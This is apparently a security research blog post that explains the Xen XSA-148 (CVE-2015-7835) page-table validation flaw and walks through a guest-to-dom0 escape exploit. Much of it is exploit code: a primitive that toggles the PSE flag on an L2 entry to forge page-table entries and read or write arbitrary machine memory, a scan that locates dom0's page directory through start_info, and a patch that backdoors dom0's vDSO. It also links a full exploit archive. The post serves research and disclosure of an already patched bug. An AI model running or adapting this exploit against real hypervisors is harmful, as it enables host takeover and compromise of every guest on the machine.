Author Jérémie Boutoille

Category Exploitation

Tags Xen, exploitation, PoC, guest-to-host, vm escape, 2016

This blog post describes the exploitation of Xen Security Advisory 148 (XSA-148) [1] (CVE-2015-7835). The vulnerability was discovered by Shangcong Luan of Alibaba and publicly disclosed in October 2015. At the time, we were working on an exploit, and neither a public proof of concept nor an exploit was available. Since then, the security researcher who disclosed the vulnerability has given a public talk [6] and will present his approach at further conferences [7]. We decided to publish this blog post anyway because our exploitation strategy is a little bit different.

Understanding everything probably requires some basic knowledge of x86 memory architecture, but we have tried to be as clear as possible. We first explain the vulnerability in detail and then present a fully working exploit that allows a guest to execute arbitrary code in dom0's context.

Vulnerability description

The advisory says [1]:

```text
Xen Security Advisory CVE-2015-7835 / XSA-148
version 4

x86: Uncontrolled creation of large page mappings by PV guests

ISSUE DESCRIPTION
=================

The code to validate level 2 page table entries is bypassed when
certain conditions are satisfied. This means that a PV guest can
create writeable mappings using super page mappings.

Such writeable mappings can violate Xen intended invariants for pages
which Xen is supposed to keep read-only.

This is possible even if the "allowsuperpage" command line option is
not used.
```

The advisory mentions level 2 page tables, super pages, paravirtualized (PV) guests and Xen invariants. Let us go through these notions.

Memory management, page table and super page



As stated in the advisory, only x86 guests are affected. This section describes the Memory Management Unit (MMU) of this architecture. The MMU translates virtual addresses (also called linear addresses) into physical addresses, using the well-known segmentation and paging mechanisms.

Segmentation was already described in our previous post about XSA-105 [8]. Paging is a bit more complex and takes place right after segmentation.





There are three paging modes, which mainly differ in the size of the linear addresses they can translate, the size of physical addresses and the supported page sizes. We only discuss IA-32e mode, which is only available on the Intel 64 architecture.

In short, the CR3 register holds the physical address of the top-level table. The CPU uses some bits of the linear address being translated to select an entry in the current table, and this entry gives the physical base address of the next table, until the final page is reached.

As you can see, there are four levels of page tables, whose names differ in Xen, Linux and Intel terminology:

| Xen | Linux | Intel |
|---|---|---|
| L4 | PGD | PML4E |
| L3 | PUD | PDPTE |
| L2 | PMD | PDE |
| L1 | PTE | PTE |

We have tried to use consistent terminology, but all three naming schemes may still appear in this blog post.
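As an illustration (a sketch of ours, not code from the exploit), the following C function splits a 48-bit linear address into the four 9-bit table indices and the 12-bit page offset used by IA-32e paging with 4KB pages. It assumes canonical addresses and simply ignores the upper 16 sign-extension bits.

```c
#include <stdint.h>

/* Indices used by a 4-level (IA-32e) page walk, named after Xen's L4..L1. */
struct walk_indices {
    unsigned l4, l3, l2, l1; /* 9 bits each: index into a 512-entry table */
    unsigned offset;         /* 12 bits: offset inside the 4KB page */
};

/* Split a canonical 48-bit linear address into its page-walk indices. */
static struct walk_indices split_linear(uint64_t va)
{
    struct walk_indices w;

    w.l4 = (unsigned)((va >> 39) & 0x1ff); /* bits 47:39 select the L4 entry */
    w.l3 = (unsigned)((va >> 30) & 0x1ff); /* bits 38:30 select the L3 entry */
    w.l2 = (unsigned)((va >> 21) & 0x1ff); /* bits 29:21 select the L2 entry */
    w.l1 = (unsigned)((va >> 12) & 0x1ff); /* bits 20:12 select the L1 entry */
    w.offset = (unsigned)(va & 0xfff);     /* bits 11:0 are the page offset */
    return w;
}
```

For instance, Xen's text at 0xffff82d080000000 falls into L4 slot 261, which matches the PML4:261 annotation in Xen's memory layout description.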



The advisory mentions super pages. As said before, paging can map pages of different sizes: IA-32e mode supports 1GB, 2MB and 4KB pages. 2MB pages are often called super pages. The difference lies in the L2 entry: instead of referring to an L1 table, it directly refers to a 2MB page. This is done by setting the PSE flag in the L2 entry (this flag is named PS in the Intel documentation).
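The sketch below (ours, with simplified masks that assume a 52-bit maximum physical address width) shows how the PSE/PS bit, bit 7 of the entry, changes the meaning of an L2 entry: when it is set, address bits 51:21 of the entry give a 2MB page and the low 21 bits of the linear address are the offset inside it; when it is clear, the entry holds the address of an L1 table and the walk continues.

```c
#include <stdint.h>

#define PTE_PSE      (1ULL << 7)            /* "PS" in the Intel manual */
#define ADDR_MASK_4K 0x000ffffffffff000ULL  /* address bits 51:12 */
#define ADDR_MASK_2M 0x000fffffffe00000ULL  /* address bits 51:21 */

/*
 * Resolve a linear address from its L2 entry. Returns 1 and stores the final
 * physical address in *out when the entry maps a 2MB super page; returns 0
 * and stores the physical address of the L1 table in *out otherwise.
 */
static int resolve_from_l2(uint64_t l2e, uint64_t va, uint64_t *out)
{
    if (l2e & PTE_PSE) {
        /* Super page: the low 21 bits of the linear address are the offset. */
        *out = (l2e & ADDR_MASK_2M) | (va & 0x1fffffULL);
        return 1;
    }
    /* Regular entry: it points to a 4KB L1 table. */
    *out = l2e & ADDR_MASK_4K;
    return 0;
}
```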

PV guest and MMU

x86 paravirtualized memory management is particularly well explained in the Xen wiki [3]. Basically, what you need to know is:

- the PV guest kernel runs in ring 3,
- PV guests use direct paging: Xen does not introduce an additional level of abstraction between pseudo-physical memory and real machine addresses,
- a PV guest must perform a hypercall (HYPERVISOR_mmu_update) in order to update a page table,
- each time HYPERVISOR_mmu_update is performed, Xen checks invariants such as "a page already referenced as an L4/L3/L2/L1 must not be mapped as writable by another virtual address". All these invariants must be maintained to make sure the guest cannot subvert the system.
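For illustration, a PV guest describes each page-table write as a (ptr, val) pair, and an array of such requests is handed to HYPERVISOR_mmu_update. The structure and command values below follow Xen's public header (xen/include/public/xen.h); the helper functions are hypothetical and the hypercall itself is not issued here. Since the machine address of an entry is 8-byte aligned, its low bits are free to carry the command, which is the same encoding as the `__machine_addr(...) | MMU_NORMAL_PT_UPDATE` expressions used in the exploit code.

```c
#include <stdint.h>

/* Layout and command values as declared in Xen's public/xen.h. */
struct mmu_update {
    uint64_t ptr; /* machine address of the entry, command in the low bits */
    uint64_t val; /* new contents of the entry */
};

#define MMU_NORMAL_PT_UPDATE      0
#define MMU_MACHPHYS_UPDATE       1
#define MMU_PT_UPDATE_PRESERVE_AD 2

/* Hypothetical helper: ask Xen to write `val` into the entry at `entry_maddr`. */
static struct mmu_update make_pt_update(uint64_t entry_maddr, uint64_t val)
{
    struct mmu_update req;

    /* Entries are 8-byte aligned, so the low 3 bits can hold the command. */
    req.ptr = (entry_maddr & ~7ULL) | MMU_NORMAL_PT_UPDATE;
    req.val = val;
    return req;
}

/* Mimics how the hypervisor splits a request back into command and address. */
static unsigned req_command(const struct mmu_update *req)
{
    return (unsigned)(req->ptr & 7);
}

static uint64_t req_entry_maddr(const struct mmu_update *req)
{
    return req->ptr & ~7ULL;
}
```

Each such request is validated by Xen against the invariants above before the entry is actually written.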

Vulnerability

With the information above, the advisory is easier to understand. It seems possible to create a writable page table and then, thanks to direct paging, to map any machine page into the guest's virtual memory with read and write rights... damn.

Let's check the patch diff:

```diff
x86: guard against undue super page PTE creation

When optional super page support got added (commit bd1cd81d64 "x86: PV
support for hugepages"), two adjustments were missed: mod_l2_entry()
needs to consider the PSE and RW bits when deciding whether to use the
fast path, and the PSE bit must not be removed from L2_DISALLOW_MASK
unconditionally.

This is XSA-148.

Signed-off-by: Jan Beulich <jbeulich@suse.com>
Reviewed-by: Tim Deegan <tim@xen.org>

--- a/xen/arch/x86/mm.c
+++ b/xen/arch/x86/mm.c
@@ -160,7 +160,10 @@ static void put_superpage(unsigned long
 static uint32_t base_disallow_mask;
 /* Global bit is allowed to be set on L1 PTEs. Intended for user mappings. */
 #define L1_DISALLOW_MASK ((base_disallow_mask | _PAGE_GNTTAB) & ~_PAGE_GLOBAL)
-#define L2_DISALLOW_MASK (base_disallow_mask & ~_PAGE_PSE)
+
+#define L2_DISALLOW_MASK (unlikely(opt_allow_superpage) \
+                          ? base_disallow_mask & ~_PAGE_PSE \
+                          : base_disallow_mask)
 
 #define l3_disallow_mask(d) (!is_pv_32bit_domain(d) ? \
                              base_disallow_mask : 0xFFFFF198U)
@@ -1841,7 +1844,10 @@ static int mod_l2_entry(l2_pgentry_t *pl
         }
 
         /* Fast path for identical mapping and presence. */
-        if ( !l2e_has_changed(ol2e, nl2e, _PAGE_PRESENT) )
+        if ( !l2e_has_changed(ol2e, nl2e,
+                              unlikely(opt_allow_superpage)
+                              ? _PAGE_PSE | _PAGE_RW | _PAGE_PRESENT
+                              : _PAGE_PRESENT) )
         {
             adjust_guest_l2e(nl2e, d);
             if ( UPDATE_ENTRY(l2, pl2e, ol2e, nl2e, pfn, vcpu, preserve_ad) )
```

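Before the patch, L2_DISALLOW_MASK unconditionally clears the PSE flag from base_disallow_mask, so PSE is always accepted in L2 entries. base_disallow_mask is initialized in arch_init_memory():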

```c
void __init arch_init_memory(void)
{
    unsigned long i, pfn, rstart_pfn, rend_pfn, iostart_pfn, ioend_pfn;

    /* Basic guest-accessible flags: PRESENT, R/W, USER, A/D, AVAIL[0,1,2] */
    base_disallow_mask = ~(_PAGE_PRESENT|_PAGE_RW|_PAGE_USER|
                           _PAGE_ACCESSED|_PAGE_DIRTY|_PAGE_AVAIL);
```

So, without the patch, a guest can set the PSE flag in an L2 entry even if the allowsuperpage option is not set, as long as the fast path is taken. The fast path is taken when neither the address stored in the entry nor the _PAGE_PRESENT flag has changed, and in that case the new entry is written without validating the page it points to:

```c
/* Update the L2 entry at pl2e to new value nl2e. pl2e is within frame pfn. */
static int mod_l2_entry(l2_pgentry_t *pl2e,
                        l2_pgentry_t nl2e,
                        unsigned long pfn,
                        int preserve_ad,
                        struct vcpu *vcpu)
{
    l2_pgentry_t ol2e;
    struct domain *d = vcpu->domain;
    struct page_info *l2pg = mfn_to_page(pfn);
    unsigned long type = l2pg->u.inuse.type_info;
    int rc = 0;

    if ( unlikely(!is_guest_l2_slot(d, type, pgentry_ptr_to_slot(pl2e))) )
    {
        MEM_LOG("Illegal L2 update attempt in Xen-private area %p", pl2e);
        return -EPERM;
    }

    if ( unlikely(__copy_from_user(&ol2e, pl2e, sizeof(ol2e)) != 0) )
        return -EFAULT;

    if ( l2e_get_flags(nl2e) & _PAGE_PRESENT )
    {
        if ( unlikely(l2e_get_flags(nl2e) & L2_DISALLOW_MASK) )
        {
            MEM_LOG("Bad L2 flags %x",
                    l2e_get_flags(nl2e) & L2_DISALLOW_MASK);
            return -EINVAL;
        }

        /* Fast path for identical mapping and presence. */
        if ( !l2e_has_changed(ol2e, nl2e, _PAGE_PRESENT) )
        {
            adjust_guest_l2e(nl2e, d);
            if ( UPDATE_ENTRY(l2, pl2e, ol2e, nl2e, pfn, vcpu, preserve_ad) )
                return 0;
            return -EBUSY;
        }
```
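To see why flipping PSE slips through, here is a simplified user-space model of the two checks (ours, not Xen's code): the L2_DISALLOW_MASK flag check and the l2e_has_changed() fast-path test, which compares the address bits plus the listed flags. The flag values are the x86 ones (_PAGE_PSE is bit 7), the masks are reduced to the low 12 flag bits, and opt_allow_superpage is modelled by the allow_superpage parameter.

```c
#include <stdint.h>

#define _PAGE_PRESENT  0x001ULL
#define _PAGE_RW       0x002ULL
#define _PAGE_USER     0x004ULL
#define _PAGE_ACCESSED 0x020ULL
#define _PAGE_DIRTY    0x040ULL
#define _PAGE_PSE      0x080ULL
#define _PAGE_AVAIL    0xe00ULL
#define ADDR_MASK      0x000ffffffffff000ULL

/* Simplified l2e_has_changed(): compare the address bits plus `flags`. */
static int l2e_has_changed(uint64_t ol2e, uint64_t nl2e, uint64_t flags)
{
    return ((ol2e ^ nl2e) & (ADDR_MASK | flags)) != 0;
}

/* Mirrors base_disallow_mask as initialized in arch_init_memory(). */
static const uint64_t base_disallow_mask =
    ~(_PAGE_PRESENT | _PAGE_RW | _PAGE_USER |
      _PAGE_ACCESSED | _PAGE_DIRTY | _PAGE_AVAIL);

/* 1 if nl2e would replace ol2e without validating what it points to. */
static int takes_unchecked_fast_path(uint64_t ol2e, uint64_t nl2e,
                                     int patched, int allow_superpage)
{
    uint64_t disallow = base_disallow_mask;
    uint64_t fast_flags = _PAGE_PRESENT;

    if (!patched || allow_superpage)
        disallow &= ~_PAGE_PSE;             /* PSE accepted in L2 entries */
    if (patched && allow_superpage)
        fast_flags |= _PAGE_PSE | _PAGE_RW; /* these bits force the slow path */

    if (nl2e & disallow & 0xfffULL)
        return 0;                           /* -EINVAL: bad L2 flags */
    return !l2e_has_changed(ol2e, nl2e, fast_flags);
}
```

In this model, turning a present, writable L2 entry into a super page (same address, PSE added) passes both checks before the patch and is written as-is. After the patch, it is rejected with -EINVAL, or sent down the slow, validating path when allowsuperpage is enabled.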

The exploitation process is:

1. take a virtual address,
2. set the PSE flag in the corresponding L2 entry, so that the virtual range now maps the L1 table itself (and the following frames) as a writable 2MB page,
3. write into the L1 table and craft entries that bypass Xen's invariants,
4. clear the PSE flag again,
5. access any machine page you want :).
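The following toy simulation (ours) walks through these steps with plain arrays: machine frames, a single L2 entry and the PSE semantics are all modelled in user space, and the 2MB alignment requirement of real super pages is ignored. With PSE set, the 2MB window starts with the L1 table's own frame, so an ordinary write forges a PTE; once PSE is cleared, the first page of the window maps the chosen frame.

```c
#include <stdint.h>

#define NFRAMES 8
#define WORDS   512                  /* 8-byte words in a 4KB frame */
#define PRESENT (1ULL << 0)
#define PSE     (1ULL << 7)

static uint64_t mem[NFRAMES][WORDS]; /* toy machine memory */
static uint64_t l2e;                 /* the L2 entry covering our 2MB window */

/* Translate a byte offset inside the 2MB window to the word it reaches. */
static uint64_t *window_word(uint64_t off)
{
    uint64_t page = off >> 12, word = (off & 0xfff) >> 3, frame;

    if (l2e & PSE)                   /* super page: contiguous frames */
        frame = (l2e >> 12) + page;
    else                             /* regular entry: look up the L1 table */
        frame = mem[l2e >> 12][page] >> 12;
    return &mem[frame][word];        /* toy: frame numbers assumed < NFRAMES */
}

/* Initial state: frame 2 is the L1 table, and its first PTE maps frame 3. */
static void toy_init(void)
{
    mem[2][0] = (3ULL << 12) | PRESENT;
    l2e = (2ULL << 12) | PRESENT;
}

/* Forge PTE 0 through the super page mapping, then read frame `target`. */
static uint64_t read_via_pse_trick(unsigned target)
{
    l2e |= PSE;                                           /* window = L1 table */
    *window_word(0) = ((uint64_t)target << 12) | PRESENT; /* forge PTE 0 */
    l2e &= ~PSE;                                          /* regular walk again */
    return *window_word(0);                               /* now frame `target` */
}
```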

The QubesOS advisory also gives a great explanation of the vulnerability [4].

Exploitation

Mapping arbitrary machine pages

You probably get the gist, but there is still a small problem: when the PSE flag is set in an L2 entry, bits 20:13 of the entry become reserved and must be cleared (see the Intel manual [2]), whereas the machine address of the L1 table it points to may have some of these bits set.

So we need a machine frame number whose reserved bits are cleared. Thanks to the Linux allocator, this can be done with the __get_free_pages function by requesting 2MB of contiguous memory (order 9):

```c
// get an aligned mfn
aligned_mfn_va = (void*) __get_free_pages(__GFP_ZERO, 9);
DEBUG("aligned_mfn_va = %p", aligned_mfn_va);
DEBUG("aligned_mfn_va mfn = 0x%lx", __machine_addr(aligned_mfn_va));
page_walk((unsigned long) aligned_mfn_va);
```
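A minimal check for such a frame, written by us under the assumption (from the Intel manual's format of a PDE mapping a 2MB page) that bit 12 of the entry is the PAT bit and bits 20:13 are reserved. Keeping the PAT bit clear as well, the frame's machine address must have bits 20:12 clear, i.e. the MFN must be a multiple of 512. The helper name is hypothetical.

```c
#include <stdint.h>

/*
 * With PS=1, an L2 entry stores a 2MB page address in bits 51:21, bit 12 is
 * PAT and bits 20:13 are reserved. Reusing the address of a 4KB frame there
 * only works cleanly if bits 20:12 of its machine address are all clear.
 */
static int mfn_usable_as_pse_target(uint64_t mfn)
{
    uint64_t maddr = mfn << 12;           /* machine address of the frame */
    return (maddr & 0x1ff000ULL) == 0;    /* bits 20:12 must be zero */
}
```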

When the PSE flag is set, the L2 entry maps 2MB of memory, so we also reserve a 2MB range of virtual memory to make sure that nothing else uses those virtual addresses:

```c
// get a 2Mb virtual memory
l2_entry_va = (void*) __get_free_pages(__GFP_ZERO, 9);
DEBUG("l2_entry_va = %p", l2_entry_va);
DEBUG("l2_entry_va mfn = 0x%lx", __machine_addr(l2_entry_va));
page_walk((unsigned long) l2_entry_va);
```
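A hypothetical sanity check for this reservation (ours, not part of the exploit): an order-9 block is 512 × 4KB = 2MB, and it is covered by exactly one L2 entry only if its virtual address is 2MB-aligned. Linux's buddy allocator returns naturally aligned blocks, so a direct-mapped order-9 allocation should satisfy this, but the check makes the assumption explicit.

```c
#include <stdint.h>

#define PAGE_SHIFT 12
#define L2_SPAN    (1ULL << 21)   /* one L2 entry covers 2MB */

/* Does [va, va + (4KB << order)) map through exactly one L2 entry? */
static int covers_exactly_one_l2(uint64_t va, unsigned order)
{
    uint64_t size = 1ULL << (PAGE_SHIFT + order);
    return size == L2_SPAN && (va & (L2_SPAN - 1)) == 0;
}
```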

Now, the idea is to use the machine frame whose reserved bits are cleared as the target of the L2 entry covering our reserved 2MB virtual range, so that this frame becomes the L1 table of that range. We have to do this because the L1 table currently referenced by this L2 entry might have some of the reserved bits set in its address. Since the aligned machine frame is also mapped elsewhere with write rights, we must first clear the RW flag of the corresponding PTE in order to preserve the Xen invariant stating that a page used as an L4/L3/L2/L1 table must not be mapped writable. This is done in the startup_dump function:

```c
int startup_dump(unsigned long l2_entry_va, unsigned long aligned_mfn_va)
{
    pte_t *pte_aligned = get_pte(aligned_mfn_va);
    pmd_t *pmd = get_pmd(l2_entry_va);
    int rc;

    // removes RW bit on the aligned_mfn_va's pte
    rc = mmu_update(__machine_addr(pte_aligned) | MMU_NORMAL_PT_UPDATE, pte_aligned->pte & ~_PAGE_RW);
    if(rc < 0)
    {
        printk("cannot unset RW flag on PTE (0x%lx)\n", aligned_mfn_va);
        return -1;
    }

    // map.
    rc = mmu_update(__machine_addr(pmd) | MMU_NORMAL_PT_UPDATE, (__mfn((void*) aligned_mfn_va) << PAGE_SHIFT) | PMD_FLAG);
    if(rc < 0)
    {
        printk("cannot update L2 entry 0x%lx\n", l2_entry_va);
        return -1;
    }

    return 0;
}
```

We are now able to read and write any machine page using the do_page_buff function:

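```c
void do_page_buff(unsigned long mfn, char *buff, int what)
{
    // expose the L1 table behind l2_entry_va as a writable 2MB page,
    // forge its first PTE so that it points to mfn, then restore the L2 entry
    set_l2_pse_flag((unsigned long) l2_entry_va);
    *(unsigned long*) l2_entry_va = (mfn << PAGE_SHIFT) | PTE_FLAG;
    unset_l2_pse_flag((unsigned long) l2_entry_va);

    // the first page of l2_entry_va now maps the target machine page
    if(what == DO_PAGE_READ)
    {
        memcpy(buff, l2_entry_va, PAGE_SIZE);
    }
    else if (what == DO_PAGE_WRITE)
    {
        memcpy(l2_entry_va, buff, PAGE_SIZE);
    }

    // clear the forged PTE the same way
    set_l2_pse_flag((unsigned long) l2_entry_va);
    *(unsigned long*) l2_entry_va = 0;
    unset_l2_pse_flag((unsigned long) l2_entry_va);
}
```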

Code execution in dom0's context

We can now read and write any machine page; the difficulty is to find something interesting. The page directory of dom0 is a good target: it allows us to resolve any dom0 virtual address to the corresponding machine page, and then either write into process memory to execute arbitrary code, or find an interesting page mapped in every process (like the vDSO ;)).

Thanks to the Xen memory layout, described in xen/include/asm-x86/config.h, it is easy to find a page that looks like a page directory:
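Resolving a dom0 virtual address then boils down to a software page walk on top of the read primitive. The sketch below is ours: `read_frame` stands for a hypothetical wrapper around do_page_buff(..., DO_PAGE_READ), replaced here by a toy in-memory backend (toy_mem, toy_read_frame) so that the code runs on its own; super pages are not handled.

```c
#include <stdint.h>
#include <string.h>

#define PTE_PRESENT 0x1ULL
#define PTE_PSE     0x80ULL
#define ADDR_MASK   0x000ffffffffff000ULL
#define NO_MFN      ((uint64_t)-1)

/* Reads the 512 entries of machine frame `mfn` (hypothetical interface). */
typedef void (*read_frame_fn)(uint64_t mfn, uint64_t entries[512]);

/* Toy backend so the sketch runs on its own: 16 fake frames in an array. */
static uint64_t toy_mem[16][512];
static void toy_read_frame(uint64_t mfn, uint64_t entries[512])
{
    memcpy(entries, toy_mem[mfn % 16], sizeof(toy_mem[0]));
}

/* Walk the 4-level tables rooted at `l4_mfn`; returns the MFN of the 4KB
 * page backing `va`, or NO_MFN if it is unmapped or uses a super page. */
static uint64_t va_to_mfn(read_frame_fn read_frame, uint64_t l4_mfn, uint64_t va)
{
    uint64_t table[512];
    uint64_t mfn = l4_mfn;

    for (int level = 4; level >= 1; level--) {
        unsigned idx = (unsigned)((va >> (12 + 9 * (level - 1))) & 0x1ff);
        read_frame(mfn, table);
        uint64_t e = table[idx];
        if (!(e & PTE_PRESENT) || (level > 1 && (e & PTE_PSE)))
            return NO_MFN;
        mfn = (e & ADDR_MASK) >> 12;  /* next table, or the final page */
    }
    return mfn;
}
```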

```c
/*
 * Memory layout:
 *  0x0000000000000000 - 0x00007fffffffffff [128TB, 2^47 bytes, PML4:0-255]
 *    Guest-defined use (see below for compatibility mode guests).
 *  0x0000800000000000 - 0xffff7fffffffffff [16EB]
 *    Inaccessible: current arch only supports 48-bit sign-extended VAs.
 *  0xffff800000000000 - 0xffff803fffffffff [256GB, 2^38 bytes, PML4:256]
 *    Read-only machine-to-phys translation table (GUEST ACCESSIBLE).
 *  0xffff804000000000 - 0xffff807fffffffff [256GB, 2^38 bytes, PML4:256]
 *    Reserved for future shared info with the guest OS (GUEST ACCESSIBLE).
 *  0xffff808000000000 - 0xffff80ffffffffff [512GB, 2^39 bytes, PML4:257]
 *    ioremap for PCI mmconfig space
 *  0xffff810000000000 - 0xffff817fffffffff [512GB, 2^39 bytes, PML4:258]
 *    Guest linear page table.
 *  0xffff818000000000 - 0xffff81ffffffffff [512GB, 2^39 bytes, PML4:259]
 *    Shadow linear page table.
 *  0xffff820000000000 - 0xffff827fffffffff [512GB, 2^39 bytes, PML4:260]
 *    Per-domain mappings (e.g., GDT, LDT).
 *  0xffff828000000000 - 0xffff82bfffffffff [256GB, 2^38 bytes, PML4:261]
 *    Machine-to-phys translation table.
 *  0xffff82c000000000 - 0xffff82cfffffffff [64GB, 2^36 bytes, PML4:261]
 *    vmap()/ioremap()/fixmap area.
 *  0xffff82d000000000 - 0xffff82d03fffffff [1GB, 2^30 bytes, PML4:261]
 *    Compatibility machine-to-phys translation table.
 *  0xffff82d040000000 - 0xffff82d07fffffff [1GB, 2^30 bytes, PML4:261]
 *    High read-only compatibility machine-to-phys translation table.
 *  0xffff82d080000000 - 0xffff82d0bfffffff [1GB, 2^30 bytes, PML4:261]
 *    Xen text, static data, bss.
#ifndef CONFIG_BIGMEM
 *  0xffff82d0c0000000 - 0xffff82dffbffffff [61GB - 64MB, PML4:261]
 *    Reserved for future use.
 *  0xffff82dffc000000 - 0xffff82dfffffffff [64MB, 2^26 bytes, PML4:261]
 *    Super-page information array.
 *  0xffff82e000000000 - 0xffff82ffffffffff [128GB, 2^37 bytes, PML4:261]
 *    Page-frame information array.
 *  0xffff830000000000 - 0xffff87ffffffffff [5TB, 5*2^40 bytes, PML4:262-271]
 *    1:1 direct mapping of all physical memory.
#else
 *  0xffff82d0c0000000 - 0xffff82ffdfffffff [188.5GB, PML4:261]
 *    Reserved for future use.
 *  0xffff82ffe0000000 - 0xffff82ffffffffff [512MB, 2^29 bytes, PML4:261]
 *    Super-page information array.
 *  0xffff830000000000 - 0xffff847fffffffff [1.5TB, 3*2^39 bytes, PML4:262-264]
 *    Page-frame information array.
 *  0xffff848000000000 - 0xffff87ffffffffff [3.5TB, 7*2^39 bytes, PML4:265-271]
 *    1:1 direct mapping of all physical memory.
#endif
 *  0xffff880000000000 - 0xffffffffffffffff [120TB, PML4:272-511]
 *    PV: Guest-defined use.
 *  0xffff880000000000 - 0xffffff7fffffffff [119.5TB, PML4:272-510]
 *    HVM/idle: continuation of 1:1 mapping
 *  0xffffff8000000000 - 0xffffffffffffffff [512GB, 2^39 bytes PML4:511]
 *    HVM/idle: unused
 *
 * Compatibility guest area layout:
 *  0x0000000000000000 - 0x00000000f57fffff [3928MB, PML4:0]
 *    Guest-defined use.
 *  0x00000000f5800000 - 0x00000000ffffffff [168MB, PML4:0]
 *    Read-only machine-to-phys translation table (GUEST ACCESSIBLE).
 *  0x0000000100000000 - 0x0000007fffffffff [508GB, PML4:0]
 *    Unused.
 *  0x0000008000000000 - 0x000000ffffffffff [512GB, 2^39 bytes, PML4:1]
 *    Hypercall argument translation area.
 *  0x0000010000000000 - 0x00007fffffffffff [127TB, 2^46 bytes, PML4:2-255]
 *    Reserved for future use.
 */
```

As you can see above, every paravirtualized guest has some Xen-related tables mapped in its virtual address space: the machine-to-phys translation table, Xen code, etc. Since these mappings are shared by every guest, the corresponding L4 entries point to the same machine pages in every page directory. We can therefore look for a machine page holding exactly the same values as our own page directory at the same indices (261 and 262, for example). Also, because dom0 runs a paravirtualized Linux kernel, entries 510 and 511 (the 0xffffff... addresses) should not be 0. This is exactly what we do to find a potential page directory:

```c
for(page=0; page<MAX_MFN; page++)
{
    dump_page_buff(page, buff);
    if(current_tab[261] == my_pgd[261] &&
       current_tab[262] == my_pgd[262] &&
       current_tab[511] != 0 &&
       current_tab[510] != 0 &&
       __mfn(my_pgd) != page)
    {
        ...
    }
}
```
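The same heuristic, isolated as a standalone predicate (a sketch of ours): current_tab and my_pgd from the snippet above become the `cand` and `mine` parameters, and the MFNs are passed explicitly.

```c
#include <stdint.h>

/*
 * A candidate L4 table shares Xen's entries 261 and 262 with our own L4,
 * has non-empty top slots 510 and 511, and is not our own table.
 */
static int looks_like_pv_l4(const uint64_t cand[512], uint64_t cand_mfn,
                            const uint64_t mine[512], uint64_t my_mfn)
{
    return cand[261] == mine[261] &&
           cand[262] == mine[262] &&
           cand[510] != 0 &&
           cand[511] != 0 &&
           cand_mfn != my_mfn;
}
```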

Finding a potential page directory is not enough: we want to be sure that it belongs to dom0.

The solution lies in the start_info structure. Xen maps this structure into the virtual address space of every paravirtualized guest (dom0 included) at boot, and it contains some useful information:

```c
struct start_info {
    char magic[32]; /* "xen-<version>-<platform>". */
    ...
    uint32_t flags; /* SIF_xxx flags. */
    ...
};
```

As you can see, start_info begins with a magic value and contains a flags field. Basically, we walk the whole page directory looking for a page that begins with the magic value:

```c
int is_startup_info_page(char *page_data)
{
    int ret = 0;
    char marker[] = "xen-3.0-x86";

    if(memcmp(page_data, marker, sizeof(marker)-1) == 0)
    {
        ret = 1;
    }

    return ret;
}
```

Given a start_info structure, we only have to check whether the SIF_INITDOMAIN flag is set to know whether it belongs to dom0:

```c
for(page=0; page<MAX_MFN; page++)
{
    dump_page_buff(page, buff);
    if(current_tab[261] == my_pgd[261] &&
       current_tab[262] == my_pgd[262] &&
       current_tab[511] != 0 &&
       current_tab[510] != 0 &&
       __mfn(my_pgd) != page)
    {
        tmp = find_start_info_into_L4(page, (pgd_t*) buff);
        if(tmp != 0)
        {
            // we find a valid start_info page
            DEBUG("start_info page : 0x%x", tmp);
            dump_page_buff(tmp, buff);
            if(start_f->flags & SIF_INITDOMAIN)
            {
                DEBUG("dom0!");
            } else {
                DEBUG("not dom0");
            }
        }
    }
}
```
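Both checks can be combined into a single predicate. This is a sketch of ours, not the exploit's find_start_info_into_L4: the leading fields and SIF_* values follow struct start_info in Xen's public/xen.h for a 64-bit guest, and the marker is the same "xen-3.0-x86" prefix as in is_startup_info_page.

```c
#include <stdint.h>
#include <string.h>

#define SIF_PRIVILEGED (1 << 0)
#define SIF_INITDOMAIN (1 << 1)

/* Leading fields of struct start_info (public/xen.h, 64-bit guest). */
struct start_info_head {
    char magic[32];             /* "xen-<version>-<platform>" */
    unsigned long nr_pages;
    unsigned long shared_info;
    uint32_t flags;             /* SIF_xxx flags */
};

/* 1 if the page starts with a start_info structure belonging to dom0. */
static int is_dom0_start_info(const void *page)
{
    static const char marker[] = "xen-3.0-x86";
    struct start_info_head si;

    memcpy(&si, page, sizeof(si));   /* copy out to avoid alignment issues */
    if (memcmp(si.magic, marker, sizeof(marker) - 1) != 0)
        return 0;
    return (si.flags & SIF_INITDOMAIN) != 0;
}
```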

From this point, we decided to backdoor dom0's vDSO, exactly like scumjr's SMM backdoor [5]. As explained in his blog post, the Linux kernel maps the vDSO library into every userland process for performance reasons, and it is very easy to fingerprint. Therefore, we just have to walk the page directory once more, look for the vDSO and patch it with our backdoor:

```c
if(start_f->flags & SIF_INITDOMAIN)
{
    DEBUG("dom0!");
    dump_page_buff(page, buff);
    tmp = find_vdso_into_L4(page, (pgd_t*) buff);
    if(tmp != 0)
    {
        DEBUG("dom0 vdso : 0x%x", tmp);
        patch_vdso(tmp);
        DEBUG("patch.");
        break;
    }
}
```
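The exploit's find_vdso_into_L4 is not shown in this post. As a hypothetical stand-in, a simple fingerprint could require the ELF magic at the start of the page and the "__vdso_" prefix used by the vDSO's exported symbol names (such as __vdso_gettimeofday) somewhere in the page. This is an assumption of ours; a real fingerprint would need to be stricter.

```c
#include <stddef.h>
#include <string.h>

#define PAGE_SIZE 4096

/* Naive search for `needle` inside a buffer (memmem() is a GNU extension). */
static int contains(const unsigned char *buf, size_t len, const char *needle)
{
    size_t n = strlen(needle);

    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(buf + i, needle, n) == 0)
            return 1;
    return 0;
}

/* Hypothetical fingerprint: an ELF header plus "__vdso_" symbol names. */
static int looks_like_vdso(const unsigned char *page)
{
    static const unsigned char elf_magic[4] = { 0x7f, 'E', 'L', 'F' };

    return memcmp(page, elf_magic, sizeof(elf_magic)) == 0 &&
           contains(page, PAGE_SIZE, "__vdso_");
}
```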

The full exploit can be downloaded here: xsa148_exploit.tar.gz.

Conclusion

This vulnerability is probably the worst ever seen in Xen, and it was introduced 7 years before its discovery. As demonstrated in this blog post, it is exploitable, and achieving code execution within dom0 is not that difficult. There are probably other options than patching the vDSO page: for example, Shangcong Luan decided to target the hypercall page [6].

Originally, this second part was supposed to be the last one... but we recently found a new vulnerability allowing a guest-to-host escape. The related advisory was publicly disclosed yesterday (XSA-182 [9], CVE-2016-6258 [10]), and a future blog post will describe how we managed to write a fully working exploit. Stay tuned!

| # | Reference |
|---|---|
| [1] | http://xenbits.xen.org/xsa/advisory-148.html |
| [2] | http://download.intel.com/design/processor/manuals/253668.pdf |
